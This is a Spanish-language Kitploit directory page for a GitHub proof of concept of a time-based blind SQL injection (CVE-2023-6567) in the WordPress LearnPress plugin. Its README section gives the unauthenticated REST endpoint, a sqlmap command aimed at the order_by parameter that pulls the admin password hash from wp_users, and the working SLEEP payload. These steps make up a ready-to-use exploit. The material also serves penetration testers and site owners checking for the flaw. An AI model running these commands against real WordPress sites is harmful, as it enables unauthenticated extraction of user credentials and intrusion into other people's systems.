Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-6567-poc — Prueba de concepto de explotación para una inyección SQL ciega basada en tiempo en el plugin LearnPress de WordPress, que permite a atacantes no autenticados extraer datos sensibles a través del parámetro order_by. | Kitploit
Herramientas/GitHubGitHub/mimiloveexe/cve-2023-6567-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubmimiloveexe/cve-2023-6567-poc

CVE-2023-6567-poc

Prueba de concepto de explotación para una inyección SQL ciega basada en tiempo en el plugin LearnPress de WordPress, que permite a atacantes no autenticados extraer datos sensibles a través del parámetro order_by.

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-6567-poc

Inyección SQL basada en tiempo

Descripción El plugin no sanea ni escapa adecuadamente el parámetro order_by antes de usarlo en una sentencia SQL, lo que provoca una inyección SQL explotable por usuarios no autenticados

  1. Solicitud GET vulnerable: https://vulnerablewordpress.com/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID&order=DESC&limit=10&return_type=html

  2. Guardar la solicitud GET

  3. sqlmap -r ~/sqli.req -p order_by --technique=T --sql-query = 'select user_pass from wp_users where id = 1'

  4. sqlmap reanudó el/los siguiente(s) punto(s) de inyección de la sesión almacenada:


Parámetro: #1* (URI) Tipo: ciego basado en tiempo Título: MySQL >= 5.0.12 AND ciego basado en tiempo (query SLEEP) Payload: https://VULNERABLEWORDPRESS/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID AND (SELECT 7508 FROM (SELECT(SLEEP(5)))VVvd)&order=DESC&limit=10&return_type=html

Descargar herramienta